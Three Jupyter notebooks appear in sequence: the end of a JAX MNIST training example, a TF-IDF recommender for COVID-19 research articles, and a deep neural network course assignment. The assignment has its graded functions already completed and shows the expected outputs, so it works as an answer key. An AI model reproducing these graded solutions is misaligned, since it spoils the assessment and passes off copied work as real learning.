with `tensorflow/datasets` JAX is laser-focused on program transformations and accelerator-backed NumPy, so we don't include data loading or munging in the JAX library. There are already a lot of great data loaders out there, so let's just use them instead of reinventing anything. 
We'll use the `tensorflow/datasets` data loader. ``` import tensorflow_datasets as tfds data_dir = '/tmp/tfds' # Fetch full datasets for evaluation # tfds.load returns tf.Tensors (or tf.data.Datasets if batch_size != -1) # You can convert them to NumPy arrays (or iterables of NumPy arrays) with tfds.dataset_as_numpy mnist_data, info = tfds.load(name="mnist", batch_size=-1, data_dir=data_dir, with_info=True) mnist_data = tfds.as_numpy(mnist_data) train_data, test_data = mnist_data['train'], mnist_data['test'] num_labels = info.features['label'].num_classes h, w, c = info.features['image'].shape num_pixels = h * w * c # Full train set train_images, train_labels = train_data['image'], train_data['label'] train_images = jnp.reshape(train_images, (len(train_images), num_pixels)) train_labels = one_hot(train_labels, num_labels) # Full test set test_images, test_labels = test_data['image'], test_data['label'] test_images = jnp.reshape(test_images, (len(test_images), num_pixels)) test_labels = one_hot(test_labels, num_labels) print('Train:', train_images.shape, train_labels.shape) print('Test:', test_images.shape, test_labels.shape) ``` ### Training Loop ``` import time def get_train_batches(): # as_supervised=True gives us the (image, label) as a tuple instead of a dict ds = tfds.load(name='mnist', split='train', as_supervised=True, data_dir=data_dir) # You can build up an arbitrary tf.data input pipeline ds = ds.batch(batch_size).prefetch(1) # tfds.dataset_as_numpy converts the tf.data.Dataset into an iterable of NumPy arrays return tfds.as_numpy(ds) for epoch in range(num_epochs): start_time = time.time() for x, y in get_train_batches(): x = jnp.reshape(x, (len(x), num_pixels)) y = one_hot(y, num_labels) params = update(params, x, y) epoch_time = time.time() - start_time train_acc = accuracy(params, train_images, train_labels) test_acc = accuracy(params, test_images, test_labels) print("Epoch {} in {:0.2f} sec".format(epoch, epoch_time)) print("Training set accuracy 
{}".format(train_acc)) print("Test set accuracy {}".format(test_acc)) ``` We've now used the whole of the JAX API: `grad` for derivatives, `jit` for speedups and `vmap` for auto-vectorization. We used NumPy to specify all of our computation, and borrowed the great data loaders from `tensorflow/datasets`, and ran the whole thing on the GPU.
github_jupyter
<i>Copyright (c) Microsoft Corporation. All rights reserved.</i> <i>Licensed under the MIT License.</i> # TF-IDF Content-Based Recommendation on the COVID-19 Open Research Dataset This demonstrates a simple implementation of Term Frequency Inverse Document Frequency (TF-IDF) content-based recommendation on the [COVID-19 Open Research Dataset](https://azure.microsoft.com/en-us/services/open-datasets/catalog/covid-19-open-research/), hosted through Azure Open Datasets. In this notebook, we will create a recommender which will return the top k recommended articles similar to any article of interest (query item) in the COVID-19 Open Research Dataset. ``` # Set the environment path to find Recommenders import sys sys.path.append("../../") # Import functions from reco_utils.dataset import covid_utils from reco_utils.recommender.tfidf.tfidf_utils import TfidfRecommender # Print version print("System version: {}".format(sys.version)) ``` ### 1. Load the dataset into a dataframe Let's begin by loading the metadata file for the dataset into a Pandas dataframe. This file contains metadata about each of the scientific articles included in the full dataset. ``` # Specify container and metadata filename container_name = 'covid19temp' metadata_filename = 'metadata.csv' sas_token = '' # please see Azure Open Datasets notebook for SAS token # Get metadata (may take around 1-2 min) metadata = covid_utils.load_pandas_df(container_name=container_name, metadata_filename=metadata_filename, azure_storage_sas_token=sas_token) ``` ### 2. Extract articles in the public domain The dataset contains articles using a variety of licenses. We will only be using articles that fall under the public domain ([cc0](https://creativecommons.org/publicdomain/zero/1.0/)). 
``` # View distribution of license types in the dataset metadata['license'].value_counts().plot(kind='bar', title='License') # Extract metadata on public domain articles only metadata_public = metadata.loc[metadata['license']=='cc0'] # Clean dataframe metadata_public = covid_utils.clean_dataframe(metadata_public) ``` Let's look at the top few rows of this dataframe which contains metadata on public domain articles. ``` # Preview metadata for public domain articles print('Number of articles in dataset: ' + str(len(metadata))) print('Number of articles in dataset that fall under the public domain (cc0): ' + str(len(metadata_public))) metadata_public.head() ``` ### 3. Retrieve full article text Now that we have the metadata for the public domain articles as its own dataframe, let's retrieve the full text for each public domain scientific article. ``` # Extract text from all public domain articles (may take 2-3 min) all_text = covid_utils.get_public_domain_text(df=metadata_public, container_name=container_name, azure_storage_sas_token=sas_token) ``` Notice that **all_text** is the same as **metadata_public** but now has an additional column called **full_text** which contains the full text for each respective article. ``` # Preview all_text.head() ``` ### 4. Instantiate the recommender All functions for data preparation and recommendation are contained within the **TfidfRecommender** class we have imported. Prior to running these functions, we must create an object of this class. Select one of the following tokenization methods to use in the model: | tokenization_method | Description | |:--------------------|:---------------------------------------------------------------------------------------------------------------------------------| | 'none' | No tokenization is applied. Each word is considered a token. | | 'nltk' | Simple stemming is applied using NLTK. | | 'bert' | HuggingFace BERT word tokenization ('bert-base-cased') is applied. 
| | 'scibert' | SciBERT word tokenization ('allenai/scibert_scivocab_cased') is applied.<br>This is recommended for scientific journal articles. | ``` # Create the recommender object recommender = TfidfRecommender(id_col='cord_uid', tokenization_method='scibert') ``` ### 5. Prepare text for use in the TF-IDF recommender The raw text retrieved for each article requires basic cleaning prior to being used in the TF-IDF model. Let's look at the full_text from the first article in our dataframe as an example. ``` # Preview the first 1000 characters of the full scientific text from one example print(all_text['full_text'][0][:1000]) ``` As seen above, there are some special characters (such as • ▲ ■ ≥ °) and punctuation which should be removed prior to using the text as input. Casing (capitalization) is preserved for [BERT-based tokenization methods](https://huggingface.co/transformers/model_doc/bert.html), but is removed for simple or no tokenization. Let's join together the **title**, **abstract**, and **full_text** columns and clean them for future use in the TF-IDF model. ``` # Assign columns to clean and combine cols_to_clean = ['title','abstract','full_text'] clean_col = 'cleaned_text' df_clean = recommender.clean_dataframe(all_text, cols_to_clean, clean_col) # Preview the dataframe with the cleaned text df_clean.head() # Preview the first 1000 characters of the cleaned version of the previous example print(df_clean[clean_col][0][:1000]) ``` Let's also tokenize the cleaned text for use in the TF-IDF model. The tokens are stored within our TfidfRecommender object. ``` # Tokenize text with tokenization_method specified in class instantiation tf, vectors_tokenized = recommender.tokenize_text(df_clean, text_col=clean_col) ``` ### 6. Recommend articles using TF-IDF Let's now fit the recommender model to the processed data (tokens) and retrieve the top k recommended articles. 
When creating our object, we specified k=5 so the `recommend_top_k_items` function will return the top 5 recommendations for each public domain article. ``` # Fit the TF-IDF vectorizer recommender.fit(tf, vectors_tokenized) # Get recommendations top_k_recommendations = recommender.recommend_top_k_items(df_clean, k=5) ``` In our recommendation table, each row represents a single recommendation. - **cord_uid** corresponds to the article that is being used to make recommendations from. - **rec_rank** contains the recommdation's rank (e.g., rank of 1 means top recommendation). - **rec_score** is the cosine similarity score between the query article and the recommended article. - **rec_cord_uid** corresponds to the recommended article. ``` # Preview the recommendations top_k_recommendations ``` Optionally, we can access the full recommendation dictionary, which contains full ranked lists for each public domain article. ``` # Optionally view full recommendation list full_rec_list = recommender.recommendations article_of_interest = 'ej795nks' print('Number of recommended articles for ' + article_of_interest + ': ' + str(len(full_rec_list[article_of_interest]))) ``` Optionally, we can also view the tokens and stop words which were used in the recommender. ``` # Optionally view tokens tokens = recommender.get_tokens() # Preview 10 tokens print(list(tokens.keys())[:10]) # Preview just the first 10 stop words sorted alphabetically stop_words = list(recommender.get_stop_words()) stop_words.sort() print(stop_words[:10]) ``` ### 7. Display top recommendations for article of interest Now that we have the recommendation table containing IDs for both query and recommended articles, we can easily return the full metadata for the top k recommendations for any given article. 
``` cols_to_keep = ['title','authors','journal','publish_time','url'] recommender.get_top_k_recommendations(metadata_public,article_of_interest,cols_to_keep) ``` ### Conclusion In this notebook, we have demonstrated how to create a TF-IDF recommender to recommend the top k (in this case 5) articles similar in content to an article of interest (in this example, article with `cord_uid='ej795nks'`).
github_jupyter
# Building your Deep Neural Network: Step by Step Welcome to your week 4 assignment (part 1 of 2)! You have previously trained a 2-layer Neural Network (with a single hidden layer). This week, you will build a deep neural network, with as many layers as you want! - In this notebook, you will implement all the functions required to build a deep neural network. - In the next assignment, you will use these functions to build a deep neural network for image classification. **After this assignment you will be able to:** - Use non-linear units like ReLU to improve your model - Build a deeper neural network (with more than 1 hidden layer) - Implement an easy-to-use neural network class **Notation**: - Superscript $[l]$ denotes a quantity associated with the $l^{th}$ layer. - Example: $a^{[L]}$ is the $L^{th}$ layer activation. $W^{[L]}$ and $b^{[L]}$ are the $L^{th}$ layer parameters. - Superscript $(i)$ denotes a quantity associated with the $i^{th}$ example. - Example: $x^{(i)}$ is the $i^{th}$ training example. - Lowerscript $i$ denotes the $i^{th}$ entry of a vector. - Example: $a^{[l]}_i$ denotes the $i^{th}$ entry of the $l^{th}$ layer's activations). Let's get started! ## 1 - Packages Let's first import all the packages that you will need during this assignment. - [numpy](www.numpy.org) is the main package for scientific computing with Python. - [matplotlib](http://matplotlib.org) is a library to plot graphs in Python. - dnn_utils provides some necessary functions for this notebook. - testCases provides some test cases to assess the correctness of your functions - np.random.seed(1) is used to keep all the random function calls consistent. It will help us grade your work. Please don't change the seed. 
``` import numpy as np import h5py import matplotlib.pyplot as plt from testCases_v3 import * from dnn_utils_v2 import sigmoid, sigmoid_backward, relu, relu_backward %matplotlib inline plt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots plt.rcParams['image.interpolation'] = 'nearest' plt.rcParams['image.cmap'] = 'gray' %load_ext autoreload %autoreload 2 np.random.seed(1) ``` ## 2 - Outline of the Assignment To build your neural network, you will be implementing several "helper functions". These helper functions will be used in the next assignment to build a two-layer neural network and an L-layer neural network. Each small helper function you will implement will have detailed instructions that will walk you through the necessary steps. Here is an outline of this assignment, you will: - Initialize the parameters for a two-layer network and for an $L$-layer neural network. - Implement the forward propagation module (shown in purple in the figure below). - Complete the LINEAR part of a layer's forward propagation step (resulting in $Z^{[l]}$). - We give you the ACTIVATION function (relu/sigmoid). - Combine the previous two steps into a new [LINEAR->ACTIVATION] forward function. - Stack the [LINEAR->RELU] forward function L-1 time (for layers 1 through L-1) and add a [LINEAR->SIGMOID] at the end (for the final layer $L$). This gives you a new L_model_forward function. - Compute the loss. - Implement the backward propagation module (denoted in red in the figure below). - Complete the LINEAR part of a layer's backward propagation step. - We give you the gradient of the ACTIVATE function (relu_backward/sigmoid_backward) - Combine the previous two steps into a new [LINEAR->ACTIVATION] backward function. - Stack [LINEAR->RELU] backward L-1 times and add [LINEAR->SIGMOID] backward in a new L_model_backward function - Finally update the parameters. 
<img src="images/final outline.png" style="width:800px;height:500px;"> <caption><center> **Figure 1**</center></caption><br> **Note** that for every forward function, there is a corresponding backward function. That is why at every step of your forward module you will be storing some values in a cache. The cached values are useful for computing gradients. In the backpropagation module you will then use the cache to calculate the gradients. This assignment will show you exactly how to carry out each of these steps. ## 3 - Initialization You will write two helper functions that will initialize the parameters for your model. The first function will be used to initialize parameters for a two layer model. The second one will generalize this initialization process to $L$ layers. ### 3.1 - 2-layer Neural Network **Exercise**: Create and initialize the parameters of the 2-layer neural network. **Instructions**: - The model's structure is: *LINEAR -> RELU -> LINEAR -> SIGMOID*. - Use random initialization for the weight matrices. Use `np.random.randn(shape)*0.01` with the correct shape. - Use zero initialization for the biases. Use `np.zeros(shape)`. 
``` # GRADED FUNCTION: initialize_parameters def initialize_parameters(n_x, n_h, n_y): """ Argument: n_x -- size of the input layer n_h -- size of the hidden layer n_y -- size of the output layer Returns: parameters -- python dictionary containing your parameters: W1 -- weight matrix of shape (n_h, n_x) b1 -- bias vector of shape (n_h, 1) W2 -- weight matrix of shape (n_y, n_h) b2 -- bias vector of shape (n_y, 1) """ np.random.seed(1) ### START CODE HERE ### (≈ 4 lines of code) W1 = np.random.randn(n_h, n_x) * 0.01 b1 = np.zeros(shape=(n_h, 1)) W2 = np.random.randn(n_y, n_h) * 0.01 b2 = np.zeros(shape=(n_y, 1)) ### END CODE HERE ### assert(W1.shape == (n_h, n_x)) assert(b1.shape == (n_h, 1)) assert(W2.shape == (n_y, n_h)) assert(b2.shape == (n_y, 1)) parameters = {"W1": W1, "b1": b1, "W2": W2, "b2": b2} return parameters parameters = initialize_parameters(3,2,1) print("W1 = " + str(parameters["W1"])) print("b1 = " + str(parameters["b1"])) print("W2 = " + str(parameters["W2"])) print("b2 = " + str(parameters["b2"])) ``` **Expected output**: <table style="width:80%"> <tr> <td> **W1** </td> <td> [[ 0.01624345 -0.00611756 -0.00528172] [-0.01072969 0.00865408 -0.02301539]] </td> </tr> <tr> <td> **b1**</td> <td>[[ 0.] [ 0.]]</td> </tr> <tr> <td>**W2**</td> <td> [[ 0.01744812 -0.00761207]]</td> </tr> <tr> <td> **b2** </td> <td> [[ 0.]] </td> </tr> </table> ### 3.2 - L-layer Neural Network The initialization for a deeper L-layer neural network is more complicated because there are many more weight matrices and bias vectors. When completing the `initialize_parameters_deep`, you should make sure that your dimensions match between each layer. Recall that $n^{[l]}$ is the number of units in layer $l$. 
Thus for example if the size of our input $X$ is $(12288, 209)$ (with $m=209$ examples) then: <table style="width:100%"> <tr> <td> </td> <td> **Shape of W** </td> <td> **Shape of b** </td> <td> **Activation** </td> <td> **Shape of Activation** </td> <tr> <tr> <td> **Layer 1** </td> <td> $(n^{[1]},12288)$ </td> <td> $(n^{[1]},1)$ </td> <td> $Z^{[1]} = W^{[1]} X + b^{[1]} $ </td> <td> $(n^{[1]},209)$ </td> <tr> <tr> <td> **Layer 2** </td> <td> $(n^{[2]}, n^{[1]})$ </td> <td> $(n^{[2]},1)$ </td> <td>$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$ </td> <td> $(n^{[2]}, 209)$ </td> <tr> <tr> <td> $\vdots$ </td> <td> $\vdots$ </td> <td> $\vdots$ </td> <td> $\vdots$</td> <td> $\vdots$ </td> <tr> <tr> <td> **Layer L-1** </td> <td> $(n^{[L-1]}, n^{[L-2]})$ </td> <td> $(n^{[L-1]}, 1)$ </td> <td>$Z^{[L-1]} = W^{[L-1]} A^{[L-2]} + b^{[L-1]}$ </td> <td> $(n^{[L-1]}, 209)$ </td> <tr> <tr> <td> **Layer L** </td> <td> $(n^{[L]}, n^{[L-1]})$ </td> <td> $(n^{[L]}, 1)$ </td> <td> $Z^{[L]} = W^{[L]} A^{[L-1]} + b^{[L]}$</td> <td> $(n^{[L]}, 209)$ </td> <tr> </table> Remember that when we compute $W X + b$ in python, it carries out broadcasting. For example, if: $$ W = \begin{bmatrix} j & k & l\\ m & n & o \\ p & q & r \end{bmatrix}\;\;\; X = \begin{bmatrix} a & b & c\\ d & e & f \\ g & h & i \end{bmatrix} \;\;\; b =\begin{bmatrix} s \\ t \\ u \end{bmatrix}\tag{2}$$ Then $WX + b$ will be: $$ WX + b = \begin{bmatrix} (ja + kd + lg) + s & (jb + ke + lh) + s & (jc + kf + li)+ s\\ (ma + nd + og) + t & (mb + ne + oh) + t & (mc + nf + oi) + t\\ (pa + qd + rg) + u & (pb + qe + rh) + u & (pc + qf + ri)+ u \end{bmatrix}\tag{3} $$ **Exercise**: Implement initialization for an L-layer Neural Network. **Instructions**: - The model's structure is *[LINEAR -> RELU] $ \times$ (L-1) -> LINEAR -> SIGMOID*. I.e., it has $L-1$ layers using a ReLU activation function followed by an output layer with a sigmoid activation function. - Use random initialization for the weight matrices. 
Use `np.random.rand(shape) * 0.01`. - Use zeros initialization for the biases. Use `np.zeros(shape)`. - We will store $n^{[l]}$, the number of units in different layers, in a variable `layer_dims`. For example, the `layer_dims` for the "Planar Data classification model" from last week would have been [2,4,1]: There were two inputs, one hidden layer with 4 hidden units, and an output layer with 1 output unit. Thus means `W1`'s shape was (4,2), `b1` was (4,1), `W2` was (1,4) and `b2` was (1,1). Now you will generalize this to $L$ layers! - Here is the implementation for $L=1$ (one layer neural network). It should inspire you to implement the general case (L-layer neural network). ```python if L == 1: parameters["W" + str(L)] = np.random.randn(layer_dims[1], layer_dims[0]) * 0.01 parameters["b" + str(L)] = np.zeros((layer_dims[1], 1)) ``` ``` # GRADED FUNCTION: initialize_parameters_deep def initialize_parameters_deep(layer_dims): """ Arguments: layer_dims -- python array (list) containing the dimensions of each layer in our network Returns: parameters -- python dictionary containing your parameters "W1", "b1", ..., "WL", "bL": Wl -- weight matrix of shape (layer_dims[l], layer_dims[l-1]) bl -- bias vector of shape (layer_dims[l], 1) """ np.random.seed(3) parameters = {} L = len(layer_dims) # number of layers in the network for l in range(1, L): ### START CODE HERE ### (≈ 2 lines of code) parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * 0.01 parameters['b' + str(l)] = np.zeros((layer_dims[l], 1)) ### END CODE HERE ### assert(parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1])) assert(parameters['b' + str(l)].shape == (layer_dims[l], 1)) return parameters parameters = initialize_parameters_deep([5,4,3]) print("W1 = " + str(parameters["W1"])) print("b1 = " + str(parameters["b1"])) print("W2 = " + str(parameters["W2"])) print("b2 = " + str(parameters["b2"])) ``` **Expected output**: <table style="width:80%"> <tr> <td> **W1** 
</td> <td>[[ 0.01788628 0.0043651 0.00096497 -0.01863493 -0.00277388] [-0.00354759 -0.00082741 -0.00627001 -0.00043818 -0.00477218] [-0.01313865 0.00884622 0.00881318 0.01709573 0.00050034] [-0.00404677 -0.0054536 -0.01546477 0.00982367 -0.01101068]]</td> </tr> <tr> <td>**b1** </td> <td>[[ 0.] [ 0.] [ 0.] [ 0.]]</td> </tr> <tr> <td>**W2** </td> <td>[[-0.01185047 -0.0020565 0.01486148 0.00236716] [-0.01023785 -0.00712993 0.00625245 -0.00160513] [-0.00768836 -0.00230031 0.00745056 0.01976111]]</td> </tr> <tr> <td>**b2** </td> <td>[[ 0.] [ 0.] [ 0.]]</td> </tr> </table> ## 4 - Forward propagation module ### 4.1 - Linear Forward Now that you have initialized your parameters, you will do the forward propagation module. You will start by implementing some basic functions that you will use later when implementing the model. You will complete three functions in this order: - LINEAR - LINEAR -> ACTIVATION where ACTIVATION will be either ReLU or Sigmoid. - [LINEAR -> RELU] $\times$ (L-1) -> LINEAR -> SIGMOID (whole model) The linear forward module (vectorized over all the examples) computes the following equations: $$Z^{[l]} = W^{[l]}A^{[l-1]} +b^{[l]}\tag{4}$$ where $A^{[0]} = X$. **Exercise**: Build the linear part of forward propagation. **Reminder**: The mathematical representation of this unit is $Z^{[l]} = W^{[l]}A^{[l-1]} +b^{[l]}$. You may also find `np.dot()` useful. If your dimensions don't match, printing `W.shape` may help. ``` # GRADED FUNCTION: linear_forward def linear_forward(A, W, b): """ Implement the linear part of a layer's forward propagation. 
Arguments: A -- activations from previous layer (or input data): (size of previous layer, number of examples) W -- weights matrix: numpy array of shape (size of current layer, size of previous layer) b -- bias vector, numpy array of shape (size of the current layer, 1) Returns: Z -- the input of the activation function, also called pre-activation parameter cache -- a python dictionary containing "A", "W" and "b" ; stored for computing the backward pass efficiently """ ### START CODE HERE ### (≈ 1 line of code) Z = np.dot(W, A) + b ### END CODE HERE ### assert(Z.shape == (W.shape[0], A.shape[1])) cache = (A, W, b) return Z, cache A, W, b = linear_forward_test_case() Z, linear_cache = linear_forward(A, W, b) print("Z = " + str(Z)) ``` **Expected output**: <table style="width:35%"> <tr> <td> **Z** </td> <td> [[ 3.26295337 -1.23429987]] </td> </tr> </table> ### 4.2 - Linear-Activation Forward In this notebook, you will use two activation functions: - **Sigmoid**: $\sigma(Z) = \sigma(W A + b) = \frac{1}{ 1 + e^{-(W A + b)}}$. We have provided you with the `sigmoid` function. This function returns **two** items: the activation value "`a`" and a "`cache`" that contains "`Z`" (it's what we will feed in to the corresponding backward function). To use it you could just call: ``` python A, activation_cache = sigmoid(Z) ``` - **ReLU**: The mathematical formula for ReLu is $A = RELU(Z) = max(0, Z)$. We have provided you with the `relu` function. This function returns **two** items: the activation value "`A`" and a "`cache`" that contains "`Z`" (it's what we will feed in to the corresponding backward function). To use it you could just call: ``` python A, activation_cache = relu(Z) ``` For more convenience, you are going to group two functions (Linear and Activation) into one function (LINEAR->ACTIVATION). Hence, you will implement a function that does the LINEAR forward step followed by an ACTIVATION forward step. 
**Exercise**: Implement the forward propagation of the *LINEAR->ACTIVATION* layer. Mathematical relation is: $A^{[l]} = g(Z^{[l]}) = g(W^{[l]}A^{[l-1]} +b^{[l]})$ where the activation "g" can be sigmoid() or relu(). Use linear_forward() and the correct activation function. ``` # GRADED FUNCTION: linear_activation_forward def linear_activation_forward(A_prev, W, b, activation): """ Implement the forward propagation for the LINEAR->ACTIVATION layer Arguments: A_prev -- activations from previous layer (or input data): (size of previous layer, number of examples) W -- weights matrix: numpy array of shape (size of current layer, size of previous layer) b -- bias vector, numpy array of shape (size of the current layer, 1) activation -- the activation to be used in this layer, stored as a text string: "sigmoid" or "relu" Returns: A -- the output of the activation function, also called the post-activation value cache -- a python dictionary containing "linear_cache" and "activation_cache"; stored for computing the backward pass efficiently """ if activation == "sigmoid": # Inputs: "A_prev, W, b". Outputs: "A, activation_cache". ### START CODE HERE ### (≈ 2 lines of code) Z, linear_cache = linear_forward(A_prev, W, b) A, activation_cache = sigmoid(Z) ### END CODE HERE ### elif activation == "relu": # Inputs: "A_prev, W, b". Outputs: "A, activation_cache". 
### START CODE HERE ### (≈ 2 lines of code) Z, linear_cache = linear_forward(A_prev, W, b) A, activation_cache = relu(Z) ### END CODE HERE ### assert (A.shape == (W.shape[0], A_prev.shape[1])) cache = (linear_cache, activation_cache) return A, cache A_prev, W, b = linear_activation_forward_test_case() A, linear_activation_cache = linear_activation_forward(A_prev, W, b, activation = "sigmoid") print("With sigmoid: A = " + str(A)) A, linear_activation_cache = linear_activation_forward(A_prev, W, b, activation = "relu") print("With ReLU: A = " + str(A)) ``` **Expected output**: <table style="width:35%"> <tr> <td> **With sigmoid: A ** </td> <td > [[ 0.96890023 0.11013289]]</td> </tr> <tr> <td> **With ReLU: A ** </td> <td > [[ 3.43896131 0. ]]</td> </tr> </table> **Note**: In deep learning, the "[LINEAR->ACTIVATION]" computation is counted as a single layer in the neural network, not two layers. ### d) L-Layer Model For even more convenience when implementing the $L$-layer Neural Net, you will need a function that replicates the previous one (`linear_activation_forward` with RELU) $L-1$ times, then follows that with one `linear_activation_forward` with SIGMOID. <img src="images/model_architecture_kiank.png" style="width:600px;height:300px;"> <caption><center> **Figure 2** : *[LINEAR -> RELU] $\times$ (L-1) -> LINEAR -> SIGMOID* model</center></caption><br> **Exercise**: Implement the forward propagation of the above model. **Instruction**: In the code below, the variable `AL` will denote $A^{[L]} = \sigma(Z^{[L]}) = \sigma(W^{[L]} A^{[L-1]} + b^{[L]})$. (This is sometimes also called `Yhat`, i.e., this is $\hat{Y}$.) **Tips**: - Use the functions you had previously written - Use a for loop to replicate [LINEAR->RELU] (L-1) times - Don't forget to keep track of the caches in the "caches" list. To add a new value `c` to a `list`, you can use `list.append(c)`. 
``` # GRADED FUNCTION: L_model_forward def L_model_forward(X, parameters): """ Implement forward propagation for the [LINEAR->RELU]*(L-1)->LINEAR->SIGMOID computation Arguments: X -- data, numpy array of shape (input size, number of examples) parameters -- output of initialize_parameters_deep() Returns: AL -- last post-activation value caches -- list of caches containing: every cache of linear_relu_forward() (there are L-1 of them, indexed from 0 to L-2) the cache of linear_sigmoid_forward() (there is one, indexed L-1) """ caches = [] A = X L = len(parameters) // 2 # number of layers in the neural network # Implement [LINEAR -> RELU]*(L-1). Add "cache" to the "caches" list. for l in range(1, L): A_prev = A ### START CODE HERE ### (≈ 2 lines of code) A, cache = linear_activation_forward(A_prev, parameters['W{}'.format(l)], parameters['b{}'.format(l)], 'relu') caches.append(cache) ### END CODE HERE ### # Implement LINEAR -> SIGMOID. Add "cache" to the "caches" list. ### START CODE HERE ### (≈ 2 lines of code) AL, cache = linear_activation_forward(A, parameters['W{}'.format(L)], parameters['b{}'.format(L)], 'sigmoid') caches.append(cache) ### END CODE HERE ### assert(AL.shape == (1,X.shape[1])) return AL, caches X, parameters = L_model_forward_test_case_2hidden() AL, caches = L_model_forward(X, parameters) print("AL = " + str(AL)) print("Length of caches list = " + str(len(caches))) ``` <table style="width:50%"> <tr> <td> **AL** </td> <td > [[ 0.03921668 0.70498921 0.19734387 0.04728177]]</td> </tr> <tr> <td> **Length of caches list ** </td> <td > 3 </td> </tr> </table> Great! Now you have a full forward propagation that takes the input X and outputs a row vector $A^{[L]}$ containing your predictions. It also records all intermediate values in "caches". Using $A^{[L]}$, you can compute the cost of your predictions. ## 5 - Cost function Now you will implement forward and backward propagation. 
You need to compute the cost, because you want to check if your model is actually learning.

**Exercise**: Compute the cross-entropy cost $J$, using the following formula: $$-\frac{1}{m} \sum\limits_{i = 1}^{m} (y^{(i)}\log\left(a^{[L] (i)}\right) + (1-y^{(i)})\log\left(1- a^{[L](i)}\right)) \tag{7}$$

```
# GRADED FUNCTION: compute_cost

def compute_cost(AL, Y):
    """
    Implement the cost function defined by equation (7).

    Arguments:
    AL -- probability vector corresponding to your label predictions, shape (1, number of examples)
    Y -- true "label" vector (for example: containing 0 if non-cat, 1 if cat), shape (1, number of examples)

    Returns:
    cost -- cross-entropy cost
    """

    m = Y.shape[1]  # number of examples; dividing by m keeps the cost scale batch-size independent

    # Compute loss from aL and y.
    ### START CODE HERE ### (≈ 1 lines of code)
    # NOTE(review): np.log yields -inf if AL reaches exactly 0 or 1; this
    # presumably relies on the sigmoid output staying strictly in (0, 1) — TODO confirm.
    cost = (-1 / m) * np.sum(np.multiply(Y, np.log(AL)) + np.multiply(1 - Y, np.log(1 - AL)))
    ### END CODE HERE ###

    cost = np.squeeze(cost)      # To make sure your cost's shape is what we expect (e.g. this turns [[17]] into 17).
    assert(cost.shape == ())

    return cost

Y, AL = compute_cost_test_case()

print("cost = " + str(compute_cost(AL, Y)))
```

**Expected Output**:

<table>
  <tr>
    <td>**cost** </td>
    <td> 0.41493159961539694</td>
  </tr>
</table>

## 6 - Backward propagation module

Just like with forward propagation, you will implement helper functions for backpropagation. Remember that back propagation is used to calculate the gradient of the loss function with respect to the parameters.
**Reminder**:
<img src="images/backprop_kiank.png" style="width:650px;height:250px;">
<caption><center> **Figure 3** : Forward and Backward propagation for *LINEAR->RELU->LINEAR->SIGMOID* <br> *The purple blocks represent the forward propagation, and the red blocks represent the backward propagation.* </center></caption>

<!--
For those of you who are expert in calculus (you don't need to be to do this assignment), the chain rule of calculus can be used to derive the derivative of the loss $\mathcal{L}$ with respect to $z^{[1]}$ in a 2-layer network as follows:

$$\frac{d \mathcal{L}(a^{[2]},y)}{{dz^{[1]}}} = \frac{d\mathcal{L}(a^{[2]},y)}{{da^{[2]}}}\frac{{da^{[2]}}}{{dz^{[2]}}}\frac{{dz^{[2]}}}{{da^{[1]}}}\frac{{da^{[1]}}}{{dz^{[1]}}} \tag{8} $$

In order to calculate the gradient $dW^{[1]} = \frac{\partial L}{\partial W^{[1]}}$, you use the previous chain rule and you do $dW^{[1]} = dz^{[1]} \times \frac{\partial z^{[1]} }{\partial W^{[1]}}$. During the backpropagation, at each step you multiply your current gradient by the gradient corresponding to the specific layer to get the gradient you wanted.

Equivalently, in order to calculate the gradient $db^{[1]} = \frac{\partial L}{\partial b^{[1]}}$, you use the previous chain rule and you do $db^{[1]} = dz^{[1]} \times \frac{\partial z^{[1]} }{\partial b^{[1]}}$. This is why we talk about **backpropagation**.
-->

Now, similar to forward propagation, you are going to build the backward propagation in three steps:
- LINEAR backward
- LINEAR -> ACTIVATION backward where ACTIVATION computes the derivative of either the ReLU or sigmoid activation
- [LINEAR -> RELU] $\times$ (L-1) -> LINEAR -> SIGMOID backward (whole model)

### 6.1 - Linear backward

For layer $l$, the linear part is: $Z^{[l]} = W^{[l]} A^{[l-1]} + b^{[l]}$ (followed by an activation).

Suppose you have already calculated the derivative $dZ^{[l]} = \frac{\partial \mathcal{L} }{\partial Z^{[l]}}$. You want to get $(dW^{[l]}, db^{[l]}, dA^{[l-1]})$.
<img src="images/linearback_kiank.png" style="width:250px;height:300px;"> <caption><center> **Figure 4** </center></caption> The three outputs $(dW^{[l]}, db^{[l]}, dA^{[l]})$ are computed using the input $dZ^{[l]}$.Here are the formulas you need: $$ dW^{[l]} = \frac{\partial \mathcal{L} }{\partial W^{[l]}} = \frac{1}{m} dZ^{[l]} A^{[l-1] T} \tag{8}$$ $$ db^{[l]} = \frac{\partial \mathcal{L} }{\partial b^{[l]}} = \frac{1}{m} \sum_{i = 1}^{m} dZ^{[l](i)}\tag{9}$$ $$ dA^{[l-1]} = \frac{\partial \mathcal{L} }{\partial A^{[l-1]}} = W^{[l] T} dZ^{[l]} \tag{10}$$ **Exercise**: Use the 3 formulas above to implement linear_backward(). ``` # GRADED FUNCTION: linear_backward def linear_backward(dZ, cache): """ Implement the linear portion of backward propagation for a single layer (layer l) Arguments: dZ -- Gradient of the cost with respect to the linear output (of current layer l) cache -- tuple of values (A_prev, W, b) coming from the forward propagation in the current layer Returns: dA_prev -- Gradient of the cost with respect to the activation (of the previous layer l-1), same shape as A_prev dW -- Gradient of the cost with respect to W (current layer l), same shape as W db -- Gradient of the cost with respect to b (current layer l), same shape as b """ A_prev, W, b = cache m = A_prev.shape[1] ### START CODE HERE ### (≈ 3 lines of code) dW = 1 / m * np.dot(dZ, A_prev.T) db = 1 / m * np.sum(dZ, axis=1, keepdims=True) dA_prev = np.dot(W.T, dZ) ### END CODE HERE ### assert (dA_prev.shape == A_prev.shape) assert (dW.shape == W.shape) assert (db.shape == b.shape) return dA_prev, dW, db # Set up some test inputs dZ, linear_cache = linear_backward_test_case() dA_prev, dW, db = linear_backward(dZ, linear_cache) print ("dA_prev = "+ str(dA_prev)) print ("dW = " + str(dW)) print ("db = " + str(db)) ``` **Expected Output**: <table style="width:90%"> <tr> <td> **dA_prev** </td> <td > [[ 0.51822968 -0.19517421] [-0.40506361 0.15255393] [ 2.37496825 -0.89445391]] </td> </tr> <tr> <td> 
